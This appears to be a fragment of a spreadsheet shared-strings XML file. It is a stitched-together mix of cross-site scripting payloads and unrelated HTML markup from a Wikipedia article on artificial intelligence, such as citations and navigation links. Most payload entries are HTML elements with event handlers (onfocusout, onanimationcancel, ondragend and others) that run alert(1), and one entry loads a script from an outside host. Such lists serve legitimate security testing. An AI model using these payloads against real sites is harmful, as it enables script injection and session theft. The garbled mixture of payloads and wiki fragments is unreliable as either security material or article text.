    <t>&lt;figure onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/figure&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt; STYLE="behavior: url(.htc);"&gt;</t>
  </si>
  <si>
    <t>&lt;details onpointerout=alert(1)&gt;XSS&lt;/details&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFNilsson1998"&gt;Nilsson 1998 &lt;/a&gt;, chpt. 20 &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;rt onmouseout="alert(1)"&gt;test&lt;/rt&gt;</t>
  </si>
  <si>
    <t>&lt;video onkeyup="alert(1)" contenteditable&gt;test&lt;/video&gt;</t>
  </si>
  <si>
    <t>&lt;template oncopy="alert(1)" contenteditable&gt;test&lt;/template&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;nobr id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/nobr&gt;</t>
  </si>
  <si>
    <t>&lt;col onpointerup=alert(1)&gt;XSS&lt;/col&gt;</t>
  </si>
  <si>
    <t>&lt;video&gt;&lt;track default onload=alert(1) src="data:text/vtt,WEBVTT"&gt;&lt;/video&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Turing_test" title="Turing test"&gt;Turing test &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;a href="/wiki/Machine_learning" title="Machine learning"&gt;Learning &lt;/a&gt;:</t>
  </si>
  <si>
    <t>&lt;title oncut="alert(1)" contenteditable&gt;test&lt;/title&gt;</t>
  </si>
  <si>
    <t>&lt;acronym onbeforepaste="alert(1)" contenteditable&gt;test&lt;/acronym&gt;</t>
  </si>
  <si>
    <t>&lt;strike onpointerup=alert(1)&gt;XSS&lt;/strike&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Humanity%2B" title="Humanity+"&gt;Humanity+ &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;tfoot onmouseout="alert(1)"&gt;test&lt;/tfoot&gt;</t>
  </si>
  <si>
    <t>&lt;dfn oncontextmenu="alert(1)"&gt;test&lt;/dfn&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; from the original on 15 January 2016. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=AI+Matters&amp;amp;rft.atitle=Future+Progress+in+Artificial+Intelligence%3A+A+Poll+Among+Experts&amp;amp;rft.volume=1&amp;amp;rft.issue=1&amp;amp;rft.pages=9-11&amp;amp;rft.date=2014&amp;amp;rft_id=info%3Adoi%2F10.1145%2F2639475.2639478&amp;amp;rft.aulast=M%C3%BCller&amp;amp;rft.aufirst=Vincent+C.&amp;amp;rft.au=Bostrom%2C+Nick&amp;amp;rft_id=http%3A%2F%2Fwww.sophia.de%2Fpdf%2F2014_PT-AI_polls.pdf&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-368"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-368"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;body onpageshow=alert(1)&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-295"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-295"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;track onpointerdown=alert(1)&gt;XSS&lt;/track&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;image style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/image&gt;</t>
  </si>
  <si>
    <t>&lt;body id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/body&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-364"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-364"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;marquee onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/marquee&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;dd oncut="alert(1)" contenteditable&gt;test&lt;/dd&gt;</t>
  </si>
  <si>
    <t>&lt;menu oncopy="alert(1)" contenteditable&gt;test&lt;/menu&gt;</t>
  </si>
  <si>
    <t>&lt;center onpaste="alert(1)" contenteditable&gt;test&lt;/center&gt;</t>
  </si>
  <si>
    <t>&lt;legend onblur=alert(1) tabindex=1 id=x&gt;&lt;/legend&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Scientific_law" title="Scientific law"&gt;Scientific law &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;tr id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/tr&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;acronym id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/acronym&gt;</t>
  </si>
  <si>
    <t>&lt;output onkeydown="alert(1)" contenteditable&gt;test&lt;/output&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;blink id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/blink&gt;</t>
  </si>
  <si>
    <t>&lt;details id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/details&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-Revival_of_connectionism-172"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-Revival_of_connectionism_172-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;slot onmousedown="alert(1)"&gt;test&lt;/slot&gt;</t>
  </si>
  <si>
    <t>&lt;colgroup onmouseup="alert(1)"&gt;test&lt;/colgroup&gt;</t>
  </si>
  <si>
    <t>&lt;isindex oncopy="alert(1)" contenteditable&gt;test&lt;/isindex&gt;</t>
  </si>
  <si>
    <t>&lt;video onblur=alert(1) tabindex=1 id=x&gt;&lt;/video&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation book"&gt;&lt;a href="/wiki/Stuart_J._Russell" title="Stuart J. Russell"&gt;Russell, Stuart &lt;/a&gt; (8 October 2019). &lt;a href="/wiki/Human_Compatible" title="Human Compatible"&gt;&lt;i&gt;Human Compatible: Artificial Intelligence and the Problem of Control &lt;/i&gt; &lt;/a&gt;. United States: Viking. &lt;a href="/wiki/International_Standard_Book_Number" title="International Standard Book Number"&gt;ISBN &lt;/a&gt;&amp;#160;&lt;a href="/wiki/Special:BookSources/978-0-525-55861-3" title="Special:BookSources/978-0-525-55861-3"&gt;&lt;bdi&gt;978-0-525-55861-3 &lt;/bdi&gt; &lt;/a&gt;. &lt;a href="/wiki/OCLC" title="OCLC"&gt;OCLC &lt;/a&gt;&amp;#160;&lt;a rel="nofollow" class="external text" href="//www.worldcat.org/oclc/1083694322"&gt;1083694322 &lt;/a&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook&amp;amp;rft.genre=book&amp;amp;rft.btitle=Human+Compatible%3A+Artificial+Intelligence+and+the+Problem+of+Control&amp;amp;rft.place=United+States&amp;amp;rft.pub=Viking&amp;amp;rft.date=2019-10-08&amp;amp;rft_id=info%3Aoclcnum%2F1083694322&amp;amp;rft.isbn=978-0-525-55861-3&amp;amp;rft.aulast=Russell&amp;amp;rft.aufirst=Stuart&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;noframes id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/noframes&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Frank_Wilczek" title="Frank Wilczek"&gt;Frank Wilczek &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;audio style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/audio&gt;</t>
  </si>
  <si>
    <t>&lt;dt onpaste="alert(1)" contenteditable&gt;test&lt;/dt&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;figcaption id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/figcaption&gt;</t>
  </si>
  <si>
    <t>&lt;br onpointermove=alert(1)&gt;XSS&lt;/br&gt;</t>
  </si>
  <si>
    <t>&lt;main onblur=alert(1) tabindex=1 id=x&gt;&lt;/main&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;iframe oncontextmenu="alert(1)"&gt;test&lt;/iframe&gt;</t>
  </si>
  <si>
    <t>&lt;plaintext oncontextmenu="alert(1)"&gt;test&lt;/plaintext&gt;</t>
  </si>
  <si>
    <t>&lt;output draggable="true" ondrag="alert(1)"&gt;test&lt;/output&gt;</t>
  </si>
  <si>
    <t>&lt;kbd draggable="true" ondragleave="alert(1)"&gt;test&lt;/kbd&gt;</t>
  </si>
  <si>
    <t>&lt;blockquote onmousedown="alert(1)"&gt;test&lt;/blockquote&gt;</t>
  </si>
  <si>
    <t>&lt;code onmouseup="alert(1)"&gt;test&lt;/code&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;multicol id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/multicol&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Emergent_algorithm" title="Emergent algorithm"&gt;Emergent algorithm &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Friedrich_Wilhelm_Joseph_Schelling" title="Friedrich Wilhelm Joseph Schelling"&gt;Friedrich Schelling &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">             &lt;/li&gt;&lt;li style="min-height: 31px;"&gt;&lt;span style="display: inline-block; width: 31px; line-height: 31px; vertical-align: middle; text-align: center;"&gt;&lt;img alt="" src="//upload.wikimedia.org/wikipedia/commons/thumb/1/1b/Wikiversity-logo-en.svg/27px-Wikiversity-logo-en.svg.png" decoding="async" width="27" height="24" style="vertical-align: middle" srcset="//upload.wikimedia.org/wikipedia/commons/thumb/1/1b/Wikiversity-logo-en.svg/41px-Wikiversity-logo-en.svg.png 1.5x, //upload.wikimedia.org/wikipedia/commons/thumb/1/1b/Wikiversity-logo-en.svg/54px-Wikiversity-logo-en.svg.png 2x" data-file-width="1000" data-file-height="900" /&gt; </t>
  </si>
  <si>
    <t>&lt;keygen onpointerup=alert(1)&gt;XSS&lt;/keygen&gt;</t>
  </si>
  <si>
    <t>&lt;table onmousemove="alert(1)"&gt;test&lt;/table&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation web"&gt;&lt;a rel="nofollow" class="external text" href="https://www.businessinsider.com/mark-zuckerberg-shares-thoughts-elon-musks-ai-2018-5"&gt;"Mark Zuckerberg responds to Elon Musk's paranoia about AI: 'AI is going to... help keep our communities safe.&lt;span class="cs1-kern-right"&gt;' </t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;title id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/title&gt;</t>
  </si>
  <si>
    <t>&lt;big id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/big&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;rtc style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/rtc&gt;</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/div&gt; &lt;/td&gt; &lt;/tr&gt;&lt;tr&gt;&lt;th scope="row" class="navbox-group" style="width:1%"&gt;People &lt;/th&gt;&lt;td class="navbox-list navbox-odd hlist" style="text-align:left;border-left-width:2px;border-left-style:solid;width:100%;padding:0px"&gt;</t>
  </si>
  <si>
    <t>&lt;content onpointerdown=alert(1)&gt;XSS&lt;/content&gt;</t>
  </si>
  <si>
    <t>Applications of natural language processing, including &lt;a href="/wiki/Information_retrieval" title="Information retrieval"&gt;information retrieval &lt;/a&gt; (i.e. &lt;a href="/wiki/Text_mining" title="Text mining"&gt;text mining &lt;/a&gt;) and &lt;a href="/wiki/Machine_translation" title="Machine translation"&gt;machine translation &lt;/a&gt;:</t>
  </si>
  <si>
    <t>&lt;tr draggable="true" ondragend="alert(1)"&gt;test&lt;/tr&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;bdo id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/bdo&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;q style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/q&gt;</t>
  </si>
  <si>
    <t>&lt;summary onpointermove=alert(1)&gt;XSS&lt;/summary&gt;</t>
  </si>
  <si>
    <t>&lt;spacer onpointerdown=alert(1)&gt;XSS&lt;/spacer&gt;</t>
  </si>
  <si>
    <t>&lt;textarea onselect=alert(1) autofocus&gt;XSS&lt;/textarea&gt;</t>
  </si>
  <si>
    <t>&lt;tfoot onkeyup="alert(1)" contenteditable&gt;test&lt;/tfoot&gt;</t>
  </si>
  <si>
    <t>&lt;video draggable="true" ondragend="alert(1)"&gt;test&lt;/video&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;picture style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/picture&gt;</t>
  </si>
  <si>
    <t>&lt;base draggable="true" ondragleave="alert(1)"&gt;test&lt;/base&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;aside style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/aside&gt;</t>
  </si>
  <si>
    <t>&lt;svg oncut="alert(1)" contenteditable&gt;test&lt;/svg&gt;</t>
  </si>
  <si>
    <t>&lt;hr draggable="true" ondragenter="alert(1)"&gt;test&lt;/hr&gt;</t>
  </si>
  <si>
    <t>&lt;SCRIPT SRC=http://.rocks/.js?&lt; B &gt;</t>
  </si>
  <si>
    <t>&lt;thead id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/thead&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;address ondblclick="alert(1)"&gt;test&lt;/address&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;ruby ondragover=alert(1) contenteditable&gt;drop here&lt;/ruby&gt;</t>
  </si>
  <si>
    <t>&lt;option onblur=alert(1) tabindex=1 id=x&gt;&lt;/option&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;code id=x tabindex=1 onfocus=alert(1)&gt;&lt;/code&gt;</t>
  </si>
  <si>
    <t>&lt;keygen onmouseover="alert(1)"&gt;test&lt;/keygen&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="#CITEREFHawkinsBlakeslee2005"&gt;Hawkins &amp;amp; Blakeslee 2005 &lt;/a&gt; &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;body id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/body&gt;</t>
  </si>
  <si>
    <t>&lt;figure onmouseleave="alert(1)"&gt;test&lt;/figure&gt;</t>
  </si>
  <si>
    <t>&lt;rtc onmouseout="alert(1)"&gt;test&lt;/rtc&gt;</t>
  </si>
  <si>
    <t>&lt;rb id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/rb&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;option draggable="true" ondragenter="alert(1)"&gt;test&lt;/option&gt;</t>
  </si>
  <si>
    <t>&lt;video controls autoplay ontimeupdate=alert(1)&gt;&lt;source src="validvideo.mp4" type="video/mp4"&gt;&lt;/video&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="/wiki/Averroes" title="Averroes"&gt;Averroes &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;span onmouseenter="alert(1)"&gt;test&lt;/span&gt;</t>
  </si>
  <si>
    <t>&lt;dialog id=x tabindex=1 onactivate=alert(1)&gt;&lt;/dialog&gt;</t>
  </si>
  <si>
    <t>&lt;plaintext id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/plaintext&gt;</t>
  </si>
  <si>
    <t>&lt;video id=x controls onfocus=alert(1)&gt;&lt;source src="validvideo.mp4" type=video/mp4&gt;&lt;/video&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-155"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-155"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;shadow id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/shadow&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;option oncontextmenu="alert(1)"&gt;test&lt;/option&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-Computational_intelligence-173"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-Computational_intelligence_173-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;xmp onmousedown="alert(1)"&gt;test&lt;/xmp&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation arxiv"&gt;Hannun, Awni; Case, Carl; Casper, Jared; Catanzaro, Bryan; Diamos, Greg; Elsen, Erich; Prenger, Ryan; Satheesh, Sanjeev; Sengupta, Shubho; Coates, Adam; &lt;a href="/wiki/Andrew_Ng" title="Andrew Ng"&gt;Ng, Andrew Y. &lt;/a&gt; (2014). "Deep Speech: Scaling up end-to-end speech recognition". &lt;a href="/wiki/ArXiv" title="ArXiv"&gt;arXiv &lt;/a&gt;:&lt;span class="cs1-lock-free" title="Freely accessible"&gt;&lt;a rel="nofollow" class="external text" href="//arxiv.org/abs/1412.5567"&gt;1412.5567 &lt;/a&gt; </t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;basefont style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/basefont&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Natalia_Bekhtereva" title="Natalia Bekhtereva"&gt;Natalia Bekhtereva &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;image id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/image&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-193"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-193"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;font onpointermove=alert(1)&gt;XSS&lt;/font&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="#CITEREFRussellNorvig2003"&gt;Russell &amp;amp; Norvig 2003 &lt;/a&gt;, pp.&amp;#160;916–932 &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;isindex onmouseleave="alert(1)"&gt;test&lt;/isindex&gt;</t>
  </si>
  <si>
    <t>&lt;span id=x tabindex=1 onfocus=alert(1)&gt;&lt;/span&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;cite id="CITEREFACM1998" class="citation web"&gt;&lt;a rel="nofollow" class="external text" href="https://web.archive.org/web/20071012025921/http://www.acm.org/class/1998/I.2.html"&gt;"ACM Computing Classification System: Artificial intelligence" &lt;/a&gt;. &lt;a href="/wiki/Association_for_Computing_Machinery" title="Association for Computing Machinery"&gt;ACM &lt;/a&gt;. 1998. Archived from &lt;a rel="nofollow" class="external text" href="http://www.acm.org/class/1998/I.2.html"&gt;the original &lt;/a&gt; on 12 October 2007&lt;span class="reference-accessdate"&gt;. Retrieved &lt;span class="nowrap"&gt;30 August </t>
  </si>
  <si>
    <t>&lt;legend draggable="true" ondragenter="alert(1)"&gt;test&lt;/legend&gt;</t>
  </si>
  <si>
    <t>&lt;strong oncontextmenu="alert(1)"&gt;test&lt;/strong&gt;</t>
  </si>
  <si>
    <t>&lt;image ondblclick="alert(1)"&gt;test&lt;/image&gt;</t>
  </si>
  <si>
    <t>&lt;form id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/form&gt;</t>
  </si>
  <si>
    <t>&lt;button onpointerleave=alert(1)&gt;XSS&lt;/button&gt;</t>
  </si>
  <si>
    <t>&lt;acronym onbeforecopy="alert(1)" contenteditable&gt;test&lt;/acronym&gt;</t>
  </si>
  <si>
    <t>&lt;nextid onkeyup="alert(1)" contenteditable&gt;test&lt;/nextid&gt;</t>
  </si>
  <si>
    <t>&lt;nav onpointerout=alert(1)&gt;XSS&lt;/nav&gt;</t>
  </si>
  <si>
    <t>&lt;li onpointermove=alert(1)&gt;XSS&lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFMcCorduck2004"&gt;McCorduck 2004 &lt;/a&gt;, pp.&amp;#160;443–445 &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;template draggable="true" ondragleave="alert(1)"&gt;test&lt;/template&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="toctext"&gt;Ethical machines </t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Medical_robot" title="Medical robot"&gt;Medical &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;meter draggable="true" ondragstart="alert(1)"&gt;test&lt;/meter&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. The Kluwer International Series in Engineering and Computer Science. &lt;b&gt;80 &lt;/b&gt;. Norwell, MA: &lt;a href="/wiki/Kluwer_Academic_Publishers" class="mw-redirect" title="Kluwer Academic Publishers"&gt;Kluwer Academic Publishers &lt;/a&gt;. &lt;a href="/wiki/Digital_object_identifier" title="Digital object identifier"&gt;doi &lt;/a&gt;:&lt;a rel="nofollow" class="external text" href="https://doi.org/10.1007%2F978-1-4613-1639-8"&gt;10.1007/978-1-4613-1639-8 &lt;/a&gt;. &lt;a href="/wiki/International_Standard_Book_Number" title="International Standard Book Number"&gt;ISBN &lt;/a&gt;&amp;#160;&lt;a href="/wiki/Special:BookSources/978-1-4613-1639-8" title="Special:BookSources/978-1-4613-1639-8"&gt;&lt;bdi&gt;978-1-4613-1639-8 &lt;/bdi&gt; &lt;/a&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook&amp;amp;rft.genre=book&amp;amp;rft.btitle=Analog+VLSI+Implementation+of+Neural+Systems&amp;amp;rft.place=Norwell%2C+MA&amp;amp;rft.series=The+Kluwer+International+Series+in+Engineering+and+Computer+Science&amp;amp;rft.pub=Kluwer+Academic+Publishers&amp;amp;rft.date=1989-05-08&amp;amp;rft_id=info%3Adoi%2F10.1007%2F978-1-4613-1639-8&amp;amp;rft.isbn=978-1-4613-1639-8&amp;amp;rft.aulast=Mead&amp;amp;rft.aufirst=Carver+A.&amp;amp;rft.au=Ismail%2C+Mohammed&amp;amp;rft_id=http%3A%2F%2Ffennetic.net%2Firc%2FChristopher%2520R.%2520Carroll%2520Carver%2520Mead%2520Mohammed%2520Ismail%2520Analog%2520VLSI%2520Implementation%2520of%2520Neural%2520Systems.pdf&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;ins onpointerover=alert(1)&gt;XSS&lt;/ins&gt;</t>
  </si>
  <si>
    <t>&lt;del onmousemove="alert(1)"&gt;test&lt;/del&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-388"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-388"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;big onpointermove=alert(1)&gt;XSS&lt;/big&gt;</t>
  </si>
  <si>
    <t>&lt;frameset onpointerover=alert(1)&gt;XSS&lt;/frameset&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFRussellNorvig2003"&gt;Russell &amp;amp; Norvig 2003 &lt;/a&gt;, p.&amp;#160;24 &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;span onbeforecopy="alert(1)" contenteditable&gt;test&lt;/span&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;cite id="CITEREFBach2008" class="citation encyclopaedia"&gt;Bach, Joscha (2008). &lt;a rel="nofollow" class="external text" href="https://books.google.com/books?id=a_ZR81Z25z0C&amp;amp;pg=PA63"&gt;"Seven Principles of Synthetic Intelligence" &lt;/a&gt;.  In Wang, Pei; Goertzel, Ben; Franklin, Stan (eds.). &lt;i&gt;Artificial General Intelligence, 2008: Proceedings of the First AGI Conference &lt;/i&gt;. IOS Press. pp.&amp;#160;63–74. &lt;a href="/wiki/International_Standard_Book_Number" title="International Standard Book Number"&gt;ISBN &lt;/a&gt;&amp;#160;&lt;a href="/wiki/Special:BookSources/978-1-58603-833-5" title="Special:BookSources/978-1-58603-833-5"&gt;&lt;bdi&gt;978-1-58603-833-5 &lt;/bdi&gt; &lt;/a&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook&amp;amp;rft.genre=bookitem&amp;amp;rft.atitle=Seven+Principles+of+Synthetic+Intelligence&amp;amp;rft.btitle=Artificial+General+Intelligence%2C+2008%3A+Proceedings+of+the+First+AGI+Conference&amp;amp;rft.pages=63-74&amp;amp;rft.pub=IOS+Press&amp;amp;rft.date=2008&amp;amp;rft.isbn=978-1-58603-833-5&amp;amp;rft.aulast=Bach&amp;amp;rft.aufirst=Joscha&amp;amp;rft_id=https%3A%2F%2Fbooks.google.com%2Fbooks%3Fid%3Da_ZR81Z25z0C%26pg%3DPA63&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;legend onpointerout=alert(1)&gt;XSS&lt;/legend&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;mark id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/mark&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Aristotle" title="Aristotle"&gt;Aristotle &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;optgroup id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/optgroup&gt;</t>
  </si>
  <si>
    <t>&lt;iframe onmousedown="alert(1)"&gt;test&lt;/iframe&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Parallel_computing" title="Parallel computing"&gt;Parallel computing &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;caption onmousedown="alert(1)"&gt;test&lt;/caption&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation web"&gt;&lt;a rel="nofollow" class="external text" href="https://spectrum.ieee.org/biomedical/diagnostics/how-ibm-watson-overpromised-and-underdelivered-on-ai-health-care"&gt;"Full Page Reload" &lt;/a&gt;. &lt;i&gt;IEEE Spectrum: Technology, Engineering, and Science News &lt;/i&gt;&lt;span class="reference-accessdate"&gt;. Retrieved &lt;span class="nowrap"&gt;3 September </t>
  </si>
  <si>
    <t>&lt;progress onpointerenter=alert(1)&gt;XSS&lt;/progress&gt;</t>
  </si>
  <si>
